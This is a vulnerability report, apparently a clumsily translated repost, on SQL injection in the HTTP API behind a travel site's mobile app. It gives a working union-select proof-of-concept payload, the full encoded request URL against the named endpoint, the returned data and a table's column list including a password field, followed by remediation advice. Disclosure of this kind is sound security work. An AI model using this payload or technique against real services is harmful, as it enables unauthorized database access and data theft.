SQL Injection Vulnerability and repair of the HTTP API interface behind the mobile phone app

An SQL injection vulnerability exists in the HTTP API interface behind the mobile app.
 
At the same time, it is very serious and serious to remind all mobile app developers that when developing the corresponding API interface for communications with the server, do not think that encrypted data transmission can be safe and used without parameter verification!
Details: beebot has several mobile apps, one of which is Travel Notes.
 
Through decompiling apk, www.2cto.com finds its http api communication interface with the server:
Http://www.mafengwo.cn/mobile/travelnotes/gettravels.php
 
Although encrypted data transmission is adopted in the communication process, it is easy to simulate. The communication parameter travels_id enters the SQL query without verification, resulting in SQL injection.
Proof of vulnerability:

1. POC:
Travels_id is "778079 and 1 = 2 union select 0, char (97,98, 97,98, 97,97, 97,98, 98,98, 97,99, 97), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -- "(without double quotation marks) URL:
 
Http://www.mafengwo.cn/mobile/travelnotes/gettravels.php? R = % 7B % 22 sign % 22% 3A % 22f7c8542ddf4533a09874d4f829123049% 22% 2C % 22 data % 22% 3A % 7B % 22travels_id % 22% 3A % 22778079 + and + 1% 3D2 + union + select + 0% 2 Cchar % 2897% 2C98% 2C97% 2C98% 2C97% 2C97% 2C97% 2C98% 2C98% 2C98% 2C97% 2C99% 2C97% 29% 2C0% 2C0% 2C0% 2C0% 2C0% 2C0% 2C0% 2C0% 2C0 -- % 22% 2C % 22device_id % 22% 3A % 22a984355c5vt74g % 22% 7D % 7D
Return Value:
 
{"Data": {"ret": 1, "message": {"id": "ababaaabbbaca", "content": "0", "img_width": 320, "img_list": [] }}, "sign": "82b60326ab8a7bd4eb43912d371b34d0 "}
 
 
2. Evidence of injection problems: the travelguide_book table contains the following:
Id, p_mddid, mddid, name, p_mdd_name, mdd_name, icon, icon_big, ver, type, expiration, product_id, file, size, password, publish, download, ob, ctime, lasttime
 
 
 
Solution:
 
Check all API interfaces for vulnerabilities such as parameters not checked (security measures executed on common pages but not on the API Layer.
 
For other suggestions, see "Problem description ".
 
In addition, the following suggestions are provided:
(1) Disable server error display.
(2) Please upgrade your system as soon as possible because of similar problems with CSDN history
 
Author horseluke